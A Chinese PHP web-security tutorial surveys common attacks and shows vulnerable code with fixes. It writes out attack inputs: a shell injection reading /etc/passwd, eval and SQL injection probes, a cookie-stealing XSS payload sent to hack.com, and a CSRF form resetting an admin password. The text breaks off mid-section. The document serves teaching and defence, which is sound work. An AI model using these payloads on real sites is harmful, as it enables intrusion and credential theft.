PHP漏洞全解
浏览:1410 发布日期:2015/04/14 分类:用法示例
针对PHP的网站主要存在下面几种攻击方式
-
- 针对PHP的网站主要存在下面几种攻击方式:
- 1、命令注入(Command Injection)
- 2、eval注入(Eval Injection)
- 3、客户端脚本攻击(Script Insertion)
- 4、跨网站脚本攻击(Cross Site Scripting, XSS)
- 5、SQL注入攻击(SQL injection)
- 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
- 7、Session 会话劫持(Session Hijacking)
- 8、Session 固定攻击(Session Fixation)
- 9、HTTP响应拆分攻击(HTTP Response Splitting)
- 10、文件上传漏洞(File Upload Attack)
- 11、目录穿越漏洞(Directory Traversal)
- 12、远程文件包含攻击(Remote Inclusion)
- 13、动态函数注入攻击(Dynamic Variable Evaluation)
- 14、URL攻击(URL attack)
- 15、表单提交欺骗攻击(Spoofed Form Submissions)
- 16、HTTP请求欺骗攻击(Spoofed HTTP Requests)
- 命令注入攻击
- PHP中可以使用下列5个函数来执行外部的应用程序或函数
- system、exec、passthru、shell_exec、“(与shell_exec功能相同)
- 函数原型
- string system(string command, int &return_var)
- command 要执行的命令
- return_var 存放执行命令的执行后的状态值
- string exec (string command, array &output, int &return_var)
- command 要执行的命令
- output 获得执行命令输出的每一行字符串
- return_var 存放执行命令后的状态值
- void passthru (string command, int &return_var)
- command 要执行的命令
- return_var 存放执行命令后的状态值
- string shell_exec (string command)
- command 要执行的命令
- 漏洞实例
- 例1:
- //ex1.php
- <?php
- $dir = $_GET["dir"];
- if (isset($dir))
- {
- echo "<pre>";
- system("ls -al ".$dir);
- echo "</pre>";
- }
- ?>
- 我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd
- 提交以后,命令变成了 system("ls -al | cat /etc/passwd");
- eval注入攻击
- eval函数将输入的字符串参数当作PHP程序代码来执行
- 函数原型:
- mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候
- //ex2.php
- <?php
- $var = "var";
- if (isset($_GET["arg"]))
- {
- $arg = $_GET["arg"];
- eval("\$var = $arg;");
- echo "\$var =".$var;
- }
- ?>
- 当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
- 动态函数
- <?php
- func A()
- {
- dosomething();
- }
- func B()
- {
- dosomething();
- }
- if (isset($_GET["func"]))
- {
- $myfunc = $_GET["func"];
- echo $myfunc();
- }
- ?>
- 程序员原意是想动态调用A和B函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生
- 防范方法
- 1、尽量不要执行外部命令
- 2、使用自定义函数或函数库来替代外部命令的功能
- 3、使用escapeshellarg函数来处理命令参数
- 4、使用safe_mode_exec_dir指定可执行文件的路径
- esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引号“"”,替换成“\"”,分号“;”替换成“\;”
- 用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内
- safe_mode = On
- safe_mode_exec_di r= /usr/local/php/bin/
- 客户端脚本植入
- 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。
- 可以被用作脚本植入的HTML标签一般包括以下几种:
- 1、<script>标签标记的javascript和vbscript等页面脚本程序。在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径
- 2、<object>标签标记的对象。这些对象是java applet、多媒体文件和ActiveX控件等。通常在data属性内指定对象的URL路径
- 3、<embed>标签标记的对象。这些对象是多媒体文件,例如:swf文件。通常在src属性内指定对象的URL路径
- 4、<applet>标签标记的对象。这些对象是java applet,通常在codebase属性内指定对象的URL路径
- 5、<form>标签标记的对象。通常在action属性内指定要处理表单数据的web应用程序的URL路径
- 客户端脚本植入的攻击步骤
- 1、攻击者注册普通用户后登陆网站
- 2、打开留言页面,插入攻击的js代码
- 3、其他用户登录网站(包括管理员),浏览此留言的内容
- 4、隐藏在留言内容中的js代码被执行,攻击成功
- 实例
- 数据库
- CREATE TABLE `postmessage` (
- `id` int(11) NOT NULL auto_increment,
- `subject` varchar(60) NOT NULL default ”,
- `name` varchar(40) NOT NULL default ”,
- `email` varchar(25) NOT NULL default ”,
- `question` mediumtext NOT NULL,
- `postdate` datetime NOT NULL default '0000-00-00 00:00:00′,
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='使用者的留言' AUTO_INCREMENT=69 ;
- //add.php 插入留言
- //list.php 留言列表
- //show.php 显示留言
- 提交下图的留言
- 浏览此留言的时候会执行js脚本
- 插入 <script>while(1){windows.open();}</script> 无限弹框
- 插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面
- 或者使用其他自行构造的js代码进行攻击
- 防范的方法
- 一般使用htmlspecialchars函数来将特殊字符转换成HTML编码
- 函数原型
- string htmlspecialchars (string string, int quote_style, string charset)
- string 是要编码的字符串
- quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换
- charset 可选,表示使用的字符集
- 函数会将下列特殊字符转换成html编码:
- & —-> &
- " —-> "
- ‘ —-> ‘
- < —-> <
- > —-> >
- 把show.php的第98行改成
- <?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>
- 然后再查看插入js的漏洞页面
- XSS跨站脚本攻击
- XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS
- 跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。
- 跨站脚本攻击的一般步骤:
- 1、攻击者以某种方式发送xss的http链接给目标用户
- 2、目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接
- 3、网站执行了此xss攻击脚本
- 4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
- 5、攻击者使用目标用户的信息登录网站,完成攻击
- 当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似 http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户cookies值
- 防范方法:
- 利用htmlspecialchars函数将特殊字符转换成HTML编码
- 函数原型
- string htmlspecialchars (string string, int quote_style, string charset)
- string 是要编码的字符串
- quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换
- charset 可选,表示使用的字符集
- 函数会将下列特殊字符转换成html编码:
- & —-> &
- " —-> "
- ‘ —-> ‘
- < —-> <
- > —-> >
- $_SERVER["PHP_SELF"]变量的跨站
- 在某个表单中,如果提交参数给自己,会用这样的语句
- <form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST">
- ……
- </form>
- $_SERVER["PHP_SELF"]变量的值为当前页面名称
- 例:
- http://www.sectop.com/get.php
- get.php中上述的表单
- 那么我们提交
- http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>
- 那么表单变成
- <form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
- 跨站脚本被插进去了
- 防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用
- <form action="" method="post">
- 这样直接避免了$_SERVER["PHP_SELF"]变量被跨站
- SQL注入攻击
- SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改动原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击。
- SQL注入攻击的一般步骤:
- 1、攻击者访问有SQL注入漏洞的站点,寻找注入点
- 2、攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句
- 3、新的sql语句被提交到数据库中执行 处理
- 4、数据库执行了新的SQL语句,引发SQL注入攻击
- 实例
- 数据库
- CREATE TABLE `postmessage` (
- `id` int(11) NOT NULL auto_increment,
- `subject` varchar(60) NOT NULL default ”,
- `name` varchar(40) NOT NULL default ”,
- `email` varchar(25) NOT NULL default ”,
- `question` mediumtext NOT NULL,
- `postdate` datetime NOT NULL default '0000-00-00 00:00:00′,
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='运用者的留言' AUTO_INCREMENT=69 ;
- grant all privileges on ch3.* to ‘sectop'@localhost identified by '123456′;
- //add.php 插入留言
- //list.php 留言列表
- //show.php 显示留言
- 页面 http://www.netsos.com.cn/show.php?id=71 可能存在注入点,我们来测试
- http://www.netsos.com.cn/show.php?id=71 and 1=1
- 返回页面
- 提交
- 一次查询到记录,一次没有,我们来看看源码
- //show.php 12-15行
- // 执行mysql查询语句
- $query = "select * from postmessage where id = ".$_GET["id"];
- $result = mysql_query($query)
- or die("执行ySQL查询语句失败:" . mysql_error());
- 参数id传递进来后,和前面的字符串结合的sql语句放入数据库执行 查询
- 提交 and 1=1,语句变成select * from postmessage where id = 71 and 1=1 这语句前值后值都为真,and以后也为真,返回查询到的数据
- 提交 and 1=2,语句变成select * from postmessage where id = 71 and 1=2 这语句前值为真,后值为假,and以后为假,查询不到任何数据
- 正常的SQL查询,经过我们构造的语句之后,形成了SQL注入攻击。通过这个注入点,我们还可以进一步拿到权限,比如说运用 union读取管理密码,读取数据库信息,或者用mysql的load_file,into outfile等函数进一步渗透。
- 防范方法
- 整型参数:
- 运用 intval函数将数据转换成整数
- 函数原型
- int intval(mixed var, int base)
- var是要转换成整形的变量
- base,可选,是基础数,默认是10
- 浮点型参数:
- 运用 floatval或doubleval函数分别转换单精度和双精度浮点型参数
- 函数原型
- int floatval(mixed var)
- var是要转换的变量
- int doubleval(mixed var)
- var是要转换的变量
- 字符型参数:
- 运用 addslashes函数来将单引号“'”转换成“\'”,双引号“"”转换成“\"”,反斜杠“\”转换成“\\”,NULL字符加上反斜杠“\”
- 函数原型
- string addslashes (string str)
- str是要检查的字符串
- 那么刚才出现的代码漏洞,我们可以这样修补
- // 执行mysql查询语句
- $query = "select * from postmessage where id = ".intval($_GET["id"]);
- $result = mysql_query($query)
- or die("执行ySQL查询语句失败:" . mysql_error());
- 如果是字符型,先判断magic_quotes_gpc能无法 为On,当不为On的时候运用 addslashes转义特殊字符
- if(get_magic_quotes_gpc())
- {
- $var = $_GET["var"];
- }
- else
- {
- $var = addslashes($_GET["var"]);
- }
- 再次测试,漏洞已经修补
- 垮网站伪造请求
- CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。
- 例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接
- <img src="http://www.shop.com/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
- 实例
- 随缘网络PHP留言板V1.0
- 任意删除留言
- //delbook.php 此页面用于删除留言
- <?php
- include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
- include_once("../conn.php");
- $del=$_GET["del"];
- $id=$_GET["id"];
- if ($del=="data")
- {
- $ID_Dele= implode(",",$_POST['adid']);
- $sql="delete from book where id in (".$ID_Dele.")";
- mysql_query($sql);
- }
- else
- {
- $sql="delete from book where id=".$id; //传递要删除的留言ID
- mysql_query($sql);
- }
- mysql_close($conn);
- echo "<script language='javascript'>";
- echo "alert(‘删除成功!');";
- echo " location='book.php';";
- echo "</script>";
- ?>
- 当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
- 利用方法:
- 我们使用普通用户留言(源代码方式),内容为
- <img src="delbook.php?id=2" />
- <img src="delbook.php?id=3" />
- <img src="delbook.php?id=4" />
- <img src="delbook.php?id=5" />
- 插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
- 现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
- 攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
- 修改管理员密码
- //pass.php
- if($_GET["act"])
- {
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
- $password=md5($_POST["password"]);
- if(empty($_POST["password"]))
- {
- $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- else
- {
- $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "<script language='javascript'>";
- echo "alert(‘修改成功!');";
- echo " location='pass.php';";
- echo "</script>";
- }
- 这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
- <body>
- <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
- <input type="radio" value="1" name="sh">
- <input type="radio" name="sh" checked value="0">
- <input type="text" name="username" value="root">
- <input type="password" name="password" value="root">
- <input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" >
- <textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
- <textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
- </form>
- </body>
- 存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
- 防范方法
- 防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:
- 1、检查网页的来源
- 2、检查内置的隐藏变量
- 3、使用POST,不要使用GET
- 检查网页来源
- 在//pass.php头部加入以下红色字体代码,验证数据提交
- if($_GET["act"])
- {
- if(isset($_SERVER["HTTP_REFERER"]))
- {
- $serverhost = $_SERVER["SERVER_NAME"];
- $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]);
- $strdomain = explode("/",$strurl);
- $sourcehost = $strdomain[0];
- if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
- {
- unset($_POST);
- echo "<script language='javascript'>";
- echo "alert(‘数据来源异常!');";
- &
- nbsp; echo " location='index.php';";
- echo "</script>";
- }
- }
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
- $password=md5($_POST["password"]);
- if(empty($_POST["password"]))
- {
- $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- else
- {
- $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "<script language='javascript'>";
- echo "alert(‘修改成功!');";
- echo " location='pass.php';";
- echo "</script>";
- }
- 检查内置隐藏变量
- 我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用
- <?php
- include_once("dlyz.php");
- include_once("../conn.php");
- if($_GET["act"])
- {
- if (!isset($_SESSION["post_id"]))
- {
- // 生成唯一的ID,并使用MD5来加密
- $post_id = md5(uniqid(rand(), true));
- // 创建Session变量
- $_SESSION["post_id"] = $post_id;
- }
- // 检查是否相等
- if (isset($_SESSION["post_id"]))
- {
- // 不相等
- if ($_SESSION["post_id"] != $_POST["post_id"])
- {
- // 清除POST变量
- unset($_POST);
- echo "<script language='javascript'>";
- echo "alert(‘数据来源异常!');";
- echo " location='index.php';";
- echo "</script>";
- }
- }
- ……
- <input type="reset" name="Submit2" value="重 置">
- <input type="hidden" name="post_id" value="<?php echo $_SESSION["post_id"];?>">
- </td></tr>
- </table>
- </form>
- <?php
- }
- mysql_close($conn);
- ?>
- </body>
- </html>
- 使用POST,不要使用GET
- 传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST
- http响应拆分
- HTTP请求的格式
- 1)请求信息:例如“Get /index.php HTTP/1.1”,请求index.php文件
- 2)表头:例如“Host: localhost”,表示服务器地址
- 3)空白行
- 4)信息正文
- “请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不可以有其他空格符。
- 下面例子发送HTTP请求给服务器www.yhsafe.com
- GET /index.php HTTP/1.1↙ //请求信息
- Host:www.yhsafe.com↙ //表头
- ↙ //空格行
- ↙
- ↙符号表示回车键,在空白行之后还要在按一个空格才会发送HTTP请求,HTTP请求的表头中只有Host表头是必要的饿,其余的HTTP表头则是根据HTTP请求的内容而定。
- HTTP请求的方法
- 1)GET:请求响应
- 2)HEAD:与GET相同的响应,只要求响应表头
- 3)POST:发送数据给服务器处理,数据包含在HTTP信息正文中
- 4)PUT:上传文件
- 5)DELETE:删除文件
- 6)TRACE:追踪收到的请求
- 7)OPTIONS:返回服务器所支持的HTTP请求的方法
- 8)CONNECT:将HTTP请求的连接转换成透明的TCP/IP通道
- HTTP响应的格式
- 服务器在处理完客户端所提出的HTTP请求后,会发送下列响应。
- 1)第一行是状态码
- 2)第二行开始是其他信息
- 状态码包含一个标识状态的数字和一个描述状态的单词。例如:
- HTTP/1.1 200 OK
- 200是标识状态的是数字,OK则是描述状态的单词,这个状态码标识请求成功。
- HTTP请求和响应的例子
- 打开cmd输入telnet,输入open www.00aq.com 80
- 打开连接后输入
- GET /index.php HTTP/1.1↙
- Host:www.00aq.com↙
- ↙
- ↙
- 返回HTTP响应的表头
- 返回的首页内容
- 使用PHP来发送HTTP请求
- header函数可以用来发送HTTP请求和响应的表头
- 函数原型
- void header(string string
